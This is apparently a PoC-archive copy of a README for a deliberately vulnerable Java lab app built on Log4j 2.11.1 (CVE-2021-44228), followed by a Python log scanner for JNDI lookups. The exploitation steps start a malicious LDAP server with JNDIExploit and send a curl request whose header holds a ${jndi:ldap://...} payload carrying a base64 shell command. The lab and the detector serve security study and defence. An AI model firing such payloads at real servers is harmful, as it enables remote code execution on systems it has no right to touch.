PoC details: f03d66927e45dea30f25ea8755e55f23cb64d10d

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j contains a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j; when that request is written to the log, remote code execution is triggered.
Description
Java application vulnerable to CVE-2021-44228
Introduction
# TekiumLog4jApp v1.0

Author: Erick Rodríguez 

Email: erickrr.tbd93@gmail.com, erodriguez@tekium.mx

License: GPLv3

Application developed in Java that simulates an application vulnerable to CVE-2021-44228. 

It uses Log4j 2.11.1 and JDK 1.8.0_181.

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/screen.jpg)

# Running

Run it:

`docker run --name tekiumlog4japp -p 8080:8080 d0ck3rt3k1umhub/tekiumlog4japp:v1`

Build the Docker image by yourself:

`docker build . -t tekiumlog4japp`

`docker run -p 8080:8080 --name tekiumlog4japp tekiumlog4japp`

# Exploitation Steps

<i>Note: This project is inspired by the <a href="https://github.com/christophetd/log4shell-vulnerable-app">christophetd</a> project.</i>

JNDIExploit.v1.2.zip is included in the repository as it was apparently removed from GitHub.

- Use <a href="https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip">JNDIExploit</a> to spin up a malicious LDAP server

`unzip JNDIExploit.v1.2.zip`

`java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888`

- Then, trigger the exploit using:

`curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC90ZWtpdW1fcHJ1ZWJhLnR4dA==}'`

- Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/response.jpg)

- To confirm that the code execution was successful, notice that the file /tmp/tekium_prueba.txt was created in the container running the vulnerable application:

`docker exec tekiumlog4japp ls /tmp`
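As an added defender-side example (not code from the original repository), a small Python scanner that flags the `${jndi:...}` lookup from the curl step above when it appears in logged request headers, extracts the callback host and port, and decodes the JNDIExploit `Basic/Command/Base64/` segment so a responder can see the intended command without running anything; the log lines and the `192.0.2.10` callback address are constructed sample data.

```python
import re
import base64

# A JNDI lookup as Log4j 2.x would evaluate it inside a logged value,
# e.g. ${jndi:ldap://host:1389/path}; scheme, host, port and path are captured.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)"
    r"(?::(?P<port>\d+))?(?P<path>[^}\s]*)\}",
    re.IGNORECASE,
)

# JNDIExploit carries the command as a Base64 segment after /Basic/Command/Base64/.
B64_CMD_RE = re.compile(r"/Basic/Command/Base64/([A-Za-z0-9+/=]+)$")


def decode_command(path):
    """Decode the JNDIExploit command segment of a lookup path, or None."""
    m = B64_CMD_RE.search(path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return None


def scan_line(line):
    """Return one finding per JNDI lookup found in a log line (empty list if clean)."""
    return [
        {
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "command": decode_command(m.group("path")),
        }
        for m in JNDI_RE.finditer(line)
    ]


def scan_log(text):
    """Scan a whole log, tagging each finding with its 1-based line number."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for finding in scan_line(line):
            finding["line"] = lineno
            hits.append(finding)
    return hits


# Constructed access-log sample: the X-Api-Version header value is appended to each line.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "X-Api-Version: 1.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "X-Api-Version: ${jndi:ldap://192.0.2.10:1389/Basic/Command/Base64/dG91Y2ggL3RtcC90ZWtpdW1fcHJ1ZWJhLnR4dA==}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "X-Api-Version: ${jndi:ldap://192.0.2.10:1389/obj}"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```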

# Commercial Support
![Tekium](https://github.com/unmanarc/uAuditAnalyzer2/blob/master/art/tekium_slogo.jpeg)

Tekium is a cybersecurity company based in Mexico that specializes in red team and blue team activities; it has clients in the financial, telecom and retail sectors.

Tekium is an active sponsor of the project, and provides commercial support in the case you need it.

For integration with other platforms such as the Elastic stack, SIEMs, managed security providers or in-house solutions, or for any other requests to extend the current functionality that you would like to see included in future versions, please contact us: info at tekium.mx

For more information, go to: https://www.tekium.mx/

File snapshot

```
[4.0K] /data/pocs/f03d66927e45dea30f25ea8755e55f23cb64d10d
├── [ 193] Dockerfile
├── [ 34M] JNDIExploit.v1.2.zip
├── [2.3K] README.md
├── [4.0K] screens
│   ├── [ 34K] response.jpg
│   └── [ 61K] screen.jpg
├── [4.0K] TekiumLog4jApp
│   ├── [1.8K] nbactions.xml
│   ├── [1.1K] nb-configuration.xml
│   ├── [2.7K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           ├── [4.0K] java
│           │   └── [4.0K] com
│           │       └── [4.0K] mycompany
│           │           └── [4.0K] tekiumlog4japp
│           │               ├── [2.2K] main.java
│           │               └── [1.5K] VulnerabilityLog4j.java
│           └── [4.0K] resources
│               └── [ 407] log4j2.xml
└── [1.8M] TekiumLog4jApp-1.0-SNAPSHOT.jar

9 directories, 12 files
```

The Shenlong bot has cached this for you.
Notes
    1. It is recommended to access the PoC through the source link first.
    2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.